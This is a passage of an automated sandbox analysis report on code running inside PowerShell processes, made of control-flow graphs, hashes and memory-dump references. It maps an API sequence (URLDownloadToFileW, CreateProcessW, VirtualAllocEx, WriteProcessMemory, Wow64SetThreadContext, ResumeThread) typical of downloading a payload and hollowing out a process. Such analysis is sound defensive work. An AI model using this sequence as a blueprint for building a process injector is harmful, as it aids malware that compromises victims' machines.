                                                                                            control_flow_graph 251 73704f8-737050a 252 7370510-7370521 251->252 253 73705ca-73705ec 251->253 256 7370523-7370529 252->256 257 737053b-7370558 252->257 258 73705ee-73705fd 253->258 259 737061b-737063e 253->259 260 737052d-7370539 256->260 261 737052b 256->261 257->253 273 737055a-737057c 257->273 262 73705ff-7370615 258->262 263 737066b-7370675 258->263 268 7370640-737064e 259->268 269 73706bb-73706c0 259->269 260->257 261->257 262->259 265 7370677-737067d 263->265 266 7370680-7370686 263->266 271 737068c-7370698 266->271 272 7370688-737068a 266->272 285 7370656-7370665 268->285 269->268 275 737069a-73706b8 271->275 272->275 280 7370596-73705ae 273->280 281 737057e-7370584 273->281 289 73705b0-73705b2 280->289 290 73705bc-73705c7 280->290 283 7370586 281->283 284 7370588-7370594 281->284 283->280 284->280 285->263 289->290
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84i$84i
                                                                                            • API String ID: 0-1526663543
                                                                                            • Opcode ID: ac359df18d18eb9ad118d25ac9e03eda02866ec6e06158ea84fe634ea3ebd9d6
                                                                                            • Instruction ID: 084e015f41f33aea4afa16503d6a9e511bc25d7b4bf40e66b90186e4b1aa679d
                                                                                            • Opcode Fuzzy Hash: ac359df18d18eb9ad118d25ac9e03eda02866ec6e06158ea84fe634ea3ebd9d6
                                                                                            • Instruction Fuzzy Hash: 135167B1704314AFE7285B688810B6EBBE6EFC5610F64C05AE84DDF381DA75DD41C7A1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 371 4841bf8-4847e52 374 4847e54-4847e5a 371->374 375 4847e5d-4847e63 371->375 374->375 376 4847e65-4847e6e 375->376 377 4847e71-4847ea6 URLDownloadToFileW 375->377 376->377 378 4847eaf-4847ec3 377->378 379 4847ea8-4847eae 377->379 379->378
                                                                                            APIs
                                                                                            • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04847E99
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1506712227.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_4840000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: DownloadFile
                                                                                            • String ID:
                                                                                            • API String ID: 1407266417-0
                                                                                            • Opcode ID: 43a16d1b0b235bac1ff1d0ddaf3c871157b05068d340bbc847ca96eb69852a69
                                                                                            • Instruction ID: fcf30938a69386930eb4c95a17c469bf710ef437206ac798893413d1cff26b49
                                                                                            • Opcode Fuzzy Hash: 43a16d1b0b235bac1ff1d0ddaf3c871157b05068d340bbc847ca96eb69852a69
                                                                                            • Instruction Fuzzy Hash: BA2106B5D0165DDFCB04CF9AD884ADEFBF4FB48710F148619E918A7210D375AA54CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 381 7371f40-7371f65 382 7371f6b-7371f70 381->382 383 7372158-73721a2 381->383 384 7371f72-7371f78 382->384 385 7371f88-7371f8c 382->385 393 7372326-737236a 383->393 394 73721a8-73721ad 383->394 386 7371f7c-7371f86 384->386 387 7371f7a 384->387 388 7371f92-7371f94 385->388 389 7372108-7372112 385->389 386->385 387->385 391 7371f96-7371fa2 388->391 392 7371fa4 388->392 395 7372114-737211d 389->395 396 7372120-7372126 389->396 402 7371fa6-7371fa8 391->402 392->402 415 7372480-73724a0 393->415 416 7372370-7372375 393->416 400 73721c5-73721c9 394->400 401 73721af-73721b5 394->401 397 737212c-7372138 396->397 398 7372128-737212a 396->398 403 737213a-7372155 397->403 398->403 406 73721cf-73721d1 400->406 407 73722d8-73722e2 400->407 404 73721b7 401->404 405 73721b9-73721c3 401->405 402->389 409 7371fae-7371fcd 402->409 404->400 405->400 413 73721d3-73721df 406->413 414 73721e1 406->414 410 73722e4-73722ec 407->410 411 73722ef-73722f5 407->411 442 7371fcf-7371fdb 409->442 443 7371fdd 409->443 419 73722f7-73722f9 411->419 420 73722fb-7372307 411->420 421 73721e3-73721e5 413->421 414->421 434 7372503-737250f 415->434 435 73724a2-73724b5 415->435 423 7372377-737237d 416->423 424 737238d-7372391 416->424 427 7372309-7372323 419->427 420->427 421->407 431 73721eb-737220a 421->431 425 7372381-737238b 423->425 426 737237f 423->426 429 7372397-7372399 424->429 430 7372432-737243c 424->430 425->424 426->424 436 737239b-73723a7 429->436 437 73723a9 429->437 438 737243e-7372446 430->438 439 7372449-737244f 430->439 469 737220c-7372218 431->469 470 737221a 431->470 459 7372511-737252a 434->459 444 73724b7-73724d9 435->444 445 73724e3-73724ed 435->445 446 73723ab-73723ad 436->446 437->446 448 7372455-7372461 439->448 449 7372451-7372453 439->449 451 7371fdf-7371fe1 442->451 443->451 486 737252d-7372556 444->486 487 73724db-73724e0 444->487 455 73724f7-73724fd 445->455 456 73724ef-73724f4 445->456 446->430 453 73723b3-73723b5 446->453 454 7372463-737247d 448->454 449->454 451->389 460 7371fe7-7371fee 451->460 462 73723b7-73723bd 453->462 463 73723cf-73723d6 453->463 455->434 457 73724ff-7372501 455->457 457->459 460->383 471 7371ff4-7371ff9 460->471 472 73723c1-73723cd 462->472 473 73723bf 462->473 466 73723ee-737242f 463->466 467 73723d8-73723de 463->467 474 73723e2-73723ec 467->474 475 73723e0 467->475 476 737221c-737221e 469->476 470->476 479 7372011-7372020 471->479 480 7371ffb-7372001 471->480 472->463 473->463 474->466 475->466 476->407 483 7372224-737225b 476->483 479->389 495 7372026-7372044 479->495 484 7372005-737200f 480->484 485 7372003 480->485 506 7372275-737227c 483->506 507 737225d-7372263 483->507 484->479 485->479 499 7372585-73725b4 486->499 500 7372558-737257e 486->500 495->389 504 737204a-737206f 495->504 508 73725b6-73725d3 499->508 509 73725ed-73725f7 499->509 500->499 504->389 531 7372075-737207c 504->531 512 7372294-73722d5 506->512 513 737227e-7372284 506->513 510 7372267-7372273 507->510 511 7372265 507->511 527 73725d5-73725e7 508->527 528 737263d-7372642 508->528 517 7372600-7372606 509->517 518 73725f9-73725fd 509->518 510->506 511->506 519 7372286 513->519 520 7372288-7372292 513->520 523 737260c-7372618 517->523 524 7372608-737260a 517->524 519->512 520->512 525 737261a-737263a 523->525 524->525 527->509 528->527 533 73720c2-73720f5 531->533 534 737207e-7372099 531->534 547 73720fc-7372105 533->547 539 73720b3-73720b7 534->539 540 737209b-73720a1 534->540 544 73720be-73720c0 539->544 542 73720a5-73720b1 540->542 543 73720a3 540->543 542->539 543->539 544->547
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 45e6544649c71b19e7a2796ad7877184fc4f012029002bda973328111402f255
                                                                                            • Instruction ID: 61a546504ae0dd9dbe5d223d4ac6546efe6fa386a78e4549b1e9da5661f7fd47
                                                                                            • Opcode Fuzzy Hash: 45e6544649c71b19e7a2796ad7877184fc4f012029002bda973328111402f255
                                                                                            • Instruction Fuzzy Hash: D1123AB17043158FEB359B68881176BBBB6BFC5211F2480ABD50ADF241DB75CD81C7A2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 887 7371f24-7371f65 889 7371f6b-7371f70 887->889 890 7372158-73721a2 887->890 891 7371f72-7371f78 889->891 892 7371f88-7371f8c 889->892 900 7372326-737236a 890->900 901 73721a8-73721ad 890->901 893 7371f7c-7371f86 891->893 894 7371f7a 891->894 895 7371f92-7371f94 892->895 896 7372108-7372112 892->896 893->892 894->892 898 7371f96-7371fa2 895->898 899 7371fa4 895->899 902 7372114-737211d 896->902 903 7372120-7372126 896->903 909 7371fa6-7371fa8 898->909 899->909 922 7372480-73724a0 900->922 923 7372370-7372375 900->923 907 73721c5-73721c9 901->907 908 73721af-73721b5 901->908 904 737212c-7372138 903->904 905 7372128-737212a 903->905 910 737213a-7372155 904->910 905->910 913 73721cf-73721d1 907->913 914 73722d8-73722e2 907->914 911 73721b7 908->911 912 73721b9-73721c3 908->912 909->896 916 7371fae-7371fcd 909->916 911->907 912->907 920 73721d3-73721df 913->920 921 73721e1 913->921 917 73722e4-73722ec 914->917 918 73722ef-73722f5 914->918 949 7371fcf-7371fdb 916->949 950 7371fdd 916->950 926 73722f7-73722f9 918->926 927 73722fb-7372307 918->927 928 73721e3-73721e5 920->928 921->928 941 7372503-737250f 922->941 942 73724a2-73724b5 922->942 930 7372377-737237d 923->930 931 737238d-7372391 923->931 934 7372309-7372323 926->934 927->934 928->914 938 73721eb-737220a 928->938 932 7372381-737238b 930->932 933 737237f 930->933 936 7372397-7372399 931->936 937 7372432-737243c 931->937 932->931 933->931 943 737239b-73723a7 936->943 944 73723a9 936->944 945 737243e-7372446 937->945 946 7372449-737244f 937->946 976 737220c-7372218 938->976 977 737221a 938->977 966 7372511-737252a 941->966 951 73724b7-73724d9 942->951 952 73724e3-73724ed 942->952 953 73723ab-73723ad 943->953 944->953 955 7372455-7372461 946->955 956 7372451-7372453 946->956 958 7371fdf-7371fe1 949->958 950->958 993 737252d-7372556 951->993 994 73724db-73724e0 951->994 962 73724f7-73724fd 952->962 963 73724ef-73724f4 952->963 953->937 960 73723b3-73723b5 953->960 961 7372463-737247d 955->961 956->961 958->896 967 7371fe7-7371fee 958->967 969 73723b7-73723bd 960->969 970 73723cf-73723d6 960->970 962->941 964 73724ff-7372501 962->964 964->966 967->890 978 7371ff4-7371ff9 967->978 979 73723c1-73723cd 969->979 980 73723bf 969->980 973 73723ee-737242f 970->973 974 73723d8-73723de 970->974 981 73723e2-73723ec 974->981 982 73723e0 974->982 983 737221c-737221e 976->983 977->983 986 7372011-7372020 978->986 987 7371ffb-7372001 978->987 979->970 980->970 981->973 982->973 983->914 990 7372224-737225b 983->990 986->896 1002 7372026-7372044 986->1002 991 7372005-737200f 987->991 992 7372003 987->992 1013 7372275-737227c 990->1013 1014 737225d-7372263 990->1014 991->986 992->986 1006 7372585-73725b4 993->1006 1007 7372558-737257e 993->1007 1002->896 1011 737204a-737206f 1002->1011 1015 73725b6-73725d3 1006->1015 1016 73725ed-73725f7 1006->1016 1007->1006 1011->896 1038 7372075-737207c 1011->1038 1019 7372294-73722d5 1013->1019 1020 737227e-7372284 1013->1020 1017 7372267-7372273 1014->1017 1018 7372265 1014->1018 1034 73725d5-73725e7 1015->1034 1035 737263d-7372642 1015->1035 1024 7372600-7372606 1016->1024 1025 73725f9-73725fd 1016->1025 1017->1013 1018->1013 1026 7372286 1020->1026 1027 7372288-7372292 1020->1027 1030 737260c-7372618 1024->1030 1031 7372608-737260a 1024->1031 1026->1019 1027->1019 1032 737261a-737263a 1030->1032 1031->1032 1034->1016 1035->1034 1040 73720c2-73720f5 1038->1040 1041 737207e-7372099 1038->1041 1054 73720fc-7372105 1040->1054 1046 73720b3-73720b7 1041->1046 1047 737209b-73720a1 1041->1047 1051 73720be-73720c0 1046->1051 1049 73720a5-73720b1 1047->1049 1050 73720a3 1047->1050 1049->1046 1050->1046 1051->1054
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f81f10aa7e3aa1bf958063893927fdc49936fa530f3246a56acefe63a6ee4a30
                                                                                            • Instruction ID: 9262d286c4ac8a56a83841ed71b549521dcd6da6b75d3636cd2203511edf548b
                                                                                            • Opcode Fuzzy Hash: f81f10aa7e3aa1bf958063893927fdc49936fa530f3246a56acefe63a6ee4a30
                                                                                            • Instruction Fuzzy Hash: EE4127F1A05306CFEB309F158A41BAB7BB2BB85250F558096D6089F345D739DE81C7B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1506160632.000000000435D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0435D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_435d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75e653d6875267f126442a7a4b80192f9c24e17cfc3aed4c3168695d84ebca5e
                                                                                            • Instruction ID: e0a79d78e913915242e5ebc5f86c4d5be59d737a197d143d4f6f290e6c3f36ee
                                                                                            • Opcode Fuzzy Hash: 75e653d6875267f126442a7a4b80192f9c24e17cfc3aed4c3168695d84ebca5e
                                                                                            • Instruction Fuzzy Hash: 9D01F271504704AAE7204E25E880F67BBD8EF81760F08C01AED084F662C378A842CAB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1506160632.000000000435D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0435D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_435d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c11c8c6a415a19263c4fc814e7ef218f52b829592f800cb9964901938b96a134
                                                                                            • Instruction ID: abb4ab2f94da56475e5f920d51183d85b2f880a68d5e705e92594b5c7f77bf8f
                                                                                            • Opcode Fuzzy Hash: c11c8c6a415a19263c4fc814e7ef218f52b829592f800cb9964901938b96a134
                                                                                            • Instruction Fuzzy Hash: 01015E6240E3C09FD7168B259994B52BFA4DF42224F19C0DBDD888F2A3C2699844CB72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: i$i$i$i
                                                                                            • API String ID: 0-1528663918
                                                                                            • Opcode ID: ab4ec054870c2cd94fe4cb3d4269ca94564f44e719738d26633103b2d501e564
                                                                                            • Instruction ID: cb511bf46aae87acccfd47914ff9b2f563d4a46fe5de7bbfdf84d05a2ead18e2
                                                                                            • Opcode Fuzzy Hash: ab4ec054870c2cd94fe4cb3d4269ca94564f44e719738d26633103b2d501e564
                                                                                            • Instruction Fuzzy Hash: D0F129B27043199FEB349B6894017ABBBE69FC6210F24807BD54ADF241DB35CD42C7A1

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.3%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:42.6%
                                                                                            Total number of Nodes:61
                                                                                            Total number of Limit Nodes:6
                                                                                            execution_graph 10884 4fd81a7 10885 4fd817e 10884->10885 10886 4fd8264 10885->10886 10889 4fdb870 10885->10889 10887 4fd82f2 10890 4fdb896 10889->10890 10891 4fdb88f 10889->10891 10890->10891 10894 4fdbd6e 10890->10894 10916 4fdb870 8 API calls 10890->10916 10917 4fdbdd0 10890->10917 10891->10887 10892 4fdbd7c 10892->10887 10893 4fdcb05 CreateProcessW 10896 4fdcb79 10893->10896 10894->10892 10900 4fdc6c3 10894->10900 10940 4fd75a4 10894->10940 10897 4fdbf59 10898 4fd75b0 Wow64SetThreadContext 10897->10898 10897->10900 10899 4fdc03a 10898->10899 10899->10900 10901 4fdc1dc VirtualAllocEx 10899->10901 10905 4fdc6de 10899->10905 10900->10893 10900->10905 10902 4fdc225 10901->10902 10902->10900 10904 4fdc2d2 VirtualAllocEx 10902->10904 10906 4fdc319 10902->10906 10903 4fd75c8 WriteProcessMemory 10912 4fdc363 10903->10912 10904->10906 10905->10887 10906->10900 10906->10903 10906->10905 10907 4fdc56f 10907->10900 10908 4fd75c8 WriteProcessMemory 10907->10908 10909 4fdc5b7 10908->10909 10909->10900 10909->10905 10910 4fd75d4 Wow64SetThreadContext 10909->10910 10911 4fdc66e 10910->10911 10911->10900 10911->10905 10914 4fdc683 ResumeThread 10911->10914 10912->10900 10912->10905 10912->10907 10913 4fd75c8 WriteProcessMemory 10912->10913 10913->10912 10914->10900 10916->10890 10919 4fdbe52 10917->10919 10918 4fdcb05 CreateProcessW 10921 4fdcb79 10918->10921 10920 4fd75a4 CreateProcessW 10919->10920 10925 4fdc6c3 10919->10925 10922 4fdbf59 10920->10922 10922->10925 10944 4fd75b0 10922->10944 10924 4fdc03a 10924->10925 10926 4fdc1dc VirtualAllocEx 10924->10926 10934 4fdc6de 10924->10934 10925->10918 10925->10934 10927 4fdc225 10926->10927 10927->10925 10929 4fdc2d2 VirtualAllocEx 10927->10929 10930 4fdc319 10927->10930 10929->10930 10930->10925 10930->10934 10948 4fd75c8 10930->10948 10931 4fdc363 10931->10925 10932 4fdc56f 10931->10932 10931->10934 10938 4fd75c8 WriteProcessMemory 10931->10938 10932->10925 10933 4fd75c8 WriteProcessMemory 10932->10933 10935 4fdc5b7 10933->10935 10934->10890 10935->10925 10935->10934 10952 4fd75d4 10935->10952 10938->10931 10939 4fdc683 ResumeThread 10939->10925 10941 4fdca20 CreateProcessW 10940->10941 10943 4fdcb79 10941->10943 10946 4fdcc60 Wow64SetThreadContext 10944->10946 10947 4fdccda 10946->10947 10947->10924 10949 4fdd4f0 WriteProcessMemory 10948->10949 10951 4fdd57b 10949->10951 10951->10931 10953 4fdcc60 Wow64SetThreadContext 10952->10953 10955 4fdc66e 10953->10955 10955->10925 10955->10934 10955->10939
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50a431de7902a90e1a444779fa395fe1cac4c25248f9e49e98506ce5324ff5fe
                                                                                            • Instruction ID: fcb5a884b7bece9963e849102b624a106144056c8d81a41aebd42a3b468067c3
                                                                                            • Opcode Fuzzy Hash: 50a431de7902a90e1a444779fa395fe1cac4c25248f9e49e98506ce5324ff5fe
                                                                                            • Instruction Fuzzy Hash: BE828F34E00255CFEB24CF64D844BAABBF3BB44310F1985A9D45AAB245DB70FD82CB91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 946 4fd7638-4fd766d 948 4fd766f-4fd7674 946->948 949 4fd7676 946->949 950 4fd767d-4fd7681 948->950 949->950 951 4fd7693-4fd76ac 950->951 952 4fd7683-4fd7691 950->952 957 4fd76ae-4fd76b5 951->957 958 4fd76b7-4fd76b9 951->958 955 4fd76cc-4fd76e9 952->955 963 4fd76eb-4fd76f0 955->963 964 4fd76f2 955->964 960 4fd76bc-4fd76c0 957->960 958->960 960->955 961 4fd76c2-4fd76c9 960->961 961->955 965 4fd76f9-4fd76fd 963->965 964->965 966 4fd7c8c-4fd7ca9 965->966 967 4fd7703-4fd7af4 call 4fd72a4 call 4fd72b4 call 4fd72c4 965->967 973 4fd7cbb 966->973 974 4fd7cab-4fd7cb0 966->974 1171 4fd7af6-4fd7b0f 967->1171 1172 4fd7b11-4fd7b1f 967->1172 976 4fd7cc2-4fd7cc6 973->976 974->976 978 4fd7ccc-4fd7d09 976->978 979 4fd817e-4fd819e 976->979 998 4fd7d0b-4fd7d10 978->998 999 4fd7d12 978->999 986 4fd81b0 979->986 987 4fd81a0-4fd81a5 979->987 989 4fd81b7-4fd81bb 986->989 987->989 992 4fd81bd-4fd81c0 989->992 993 4fd81c9-4fd8214 call 4fd3844 call 4fd6634 989->993 992->993 1033 4fd8219-4fd8220 call 4fd6644 993->1033 1002 4fd7d19-4fd7d1d 998->1002 999->1002 1004 4fd7eb8-4fd80c2 call 4fd72a4 call 4fd72b4 call 4fd72c4 1002->1004 1005 4fd7d23-4fd7eb3 call 4fd6624 1002->1005 1132 4fd80e5-4fd80f9 1004->1132 1133 4fd80c4-4fd80e3 1004->1133 1005->1004 1038 4fd8225-4fd824e 1033->1038 1052 4fd8257 1038->1052 1053 4fd8250-4fd8255 1038->1053 1054 4fd825e-4fd8262 1052->1054 1053->1054 1058 4fd8264-4fd82ad 1054->1058 1059 4fd82b0-4fd82e1 1054->1059 1079 4fd82e8-4fd82ec call 4fdb870 1059->1079 1084 4fd82f2-4fd82f9 1079->1084 1134 4fd80ff-4fd8118 1132->1134 1133->1134 1136 4fd811a-4fd8120 1134->1136 1137 4fd8126-4fd8153 1134->1137 1136->1137 1142 4fd815f 1137->1142 1143 4fd8155-4fd815d 1137->1143 1144 4fd8169-4fd8170 1142->1144 1143->1144 1146 4fd817b 1144->1146 1147 4fd8172 1144->1147 1146->979 1147->1146 1173 4fd7b25-4fd7b3b 1171->1173 1172->1173 1174 4fd7b3d-4fd7b49 1173->1174 1175 4fd7b4f-4fd7c61 1173->1175 1174->1175 1193 4fd7c6d 1175->1193 1194 4fd7c63-4fd7c6b 1175->1194 1195 4fd7c77-4fd7c7e 1193->1195 1194->1195 1196 4fd7c89-4fd7c8a 1195->1196 1197 4fd7c80 1195->1197 1196->966 1197->1196
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 426c77ae5115f2d82bff9ebe112f7f790905fbddcb1067260e08a1191c28fed0
                                                                                            • Instruction ID: 499d8066afca87520a071c43bc2a920fadc522e5d2acc3f46ec502cea769af3b
                                                                                            • Opcode Fuzzy Hash: 426c77ae5115f2d82bff9ebe112f7f790905fbddcb1067260e08a1191c28fed0
                                                                                            • Instruction Fuzzy Hash: 5E722834A00619CFDB18EF78D8597AD7BB2BB88301F1040A9D90AAB394DF395D86DF51
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 04FDC20C
                                                                                            • VirtualAllocEx.KERNEL32(?,00000001,00000000,?,?), ref: 04FDC300
                                                                                              • Part of subcall function 04FD75C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1AFA789D,00000000,?,?,?,?,00000000,?,04FDC363,?,00000000,?), ref: 04FDD56C
                                                                                            • ResumeThread.KERNELBASE(?), ref: 04FDC6AA
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04FDCB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                            • String ID:
                                                                                            • API String ID: 4270437565-0
                                                                                            • Opcode ID: f054d4dde3ebaf9c833dbfc8fd5e84df96db4ed650e8d1d4293e21197ba6397e
                                                                                            • Instruction ID: f5b9d3bbf656f7f2f29aeeb8ef229abc1b8c5e5ca6bb75896a70c98ac58865d4
                                                                                            • Opcode Fuzzy Hash: f054d4dde3ebaf9c833dbfc8fd5e84df96db4ed650e8d1d4293e21197ba6397e
                                                                                            • Instruction Fuzzy Hash: 89824870E00299CFEB24DF64C944BAABBF2BF44304F1885A9D55AAB250DB71BD85CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 648 4fdd0db-4fdd536 651 4fdd538-4fdd53e 648->651 652 4fdd540-4fdd579 WriteProcessMemory 648->652 651->652 653 4fdd57b-4fdd581 652->653 654 4fdd582-4fdd5a3 652->654 653->654
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1AFA789D,00000000,?,?,?,?,00000000,?,04FDC363,?,00000000,?), ref: 04FDD56C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 37dc6420a15c87361a1b0d2b70a72fa979c4cc064f8fc73822576eb5c5fd955b
                                                                                            • Instruction ID: 1af74e397822bc107b398b106c2905ffc1393ed9e64e42bec2decfeeecd3e74f
                                                                                            • Opcode Fuzzy Hash: 37dc6420a15c87361a1b0d2b70a72fa979c4cc064f8fc73822576eb5c5fd955b
                                                                                            • Instruction Fuzzy Hash: A1319E728053589FDB11CFAAD880BDEBFF4EF49320F04806AE444E7211C338A945CBA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 656 4fdca14-4fdca99 658 4fdca9b-4fdca9e 656->658 659 4fdcaa1-4fdcaa8 656->659 658->659 660 4fdcaaa-4fdcab0 659->660 661 4fdcab3-4fdcac9 659->661 660->661 662 4fdcacb-4fdcad1 661->662 663 4fdcad4-4fdcb77 CreateProcessW 661->663 662->663 665 4fdcb79-4fdcb7f 663->665 666 4fdcb80-4fdcbf8 663->666 665->666 673 4fdcc0a-4fdcc11 666->673 674 4fdcbfa-4fdcc00 666->674 675 4fdcc28 673->675 676 4fdcc13-4fdcc22 673->676 674->673 678 4fdcc29 675->678 676->675 678->678
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04FDCB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: d0fe03d37488eeaf6ae256f79063422dde638f7c2fc4ebea04df1c7795838c98
                                                                                            • Instruction ID: 55ac5c5e8e25308cbb397f4757c16d4231ca1aeb7342a30b8d00b7c6716b2304
                                                                                            • Opcode Fuzzy Hash: d0fe03d37488eeaf6ae256f79063422dde638f7c2fc4ebea04df1c7795838c98
                                                                                            • Instruction Fuzzy Hash: 58513C71D01269DFEB24CFA9C840BDDBBB5BF48314F0485AAE909B7240DB31AA85CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 679 4fd75a4-4fdca99 681 4fdca9b-4fdca9e 679->681 682 4fdcaa1-4fdcaa8 679->682 681->682 683 4fdcaaa-4fdcab0 682->683 684 4fdcab3-4fdcac9 682->684 683->684 685 4fdcacb-4fdcad1 684->685 686 4fdcad4-4fdcb77 CreateProcessW 684->686 685->686 688 4fdcb79-4fdcb7f 686->688 689 4fdcb80-4fdcbf8 686->689 688->689 696 4fdcc0a-4fdcc11 689->696 697 4fdcbfa-4fdcc00 689->697 698 4fdcc28 696->698 699 4fdcc13-4fdcc22 696->699 697->696 701 4fdcc29 698->701 699->698 701->701
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04FDCB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 93afdcddb3a52d566377de5806857d3040657105bb437a29e7cf8b2c1cd3fbf4
                                                                                            • Instruction ID: f9ed083469dea160af67eb06ebbb5639ab3e48fc6bf817f58d464456a7e03463
                                                                                            • Opcode Fuzzy Hash: 93afdcddb3a52d566377de5806857d3040657105bb437a29e7cf8b2c1cd3fbf4
                                                                                            • Instruction Fuzzy Hash: 27513971D01269DFEB24CF99C840BDDBBB6BF48304F0484AAE909B7240DB71AA85CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 809 4fd75c8-4fdd536 811 4fdd538-4fdd53e 809->811 812 4fdd540-4fdd579 WriteProcessMemory 809->812 811->812 813 4fdd57b-4fdd581 812->813 814 4fdd582-4fdd5a3 812->814 813->814
                                                                                            APIs
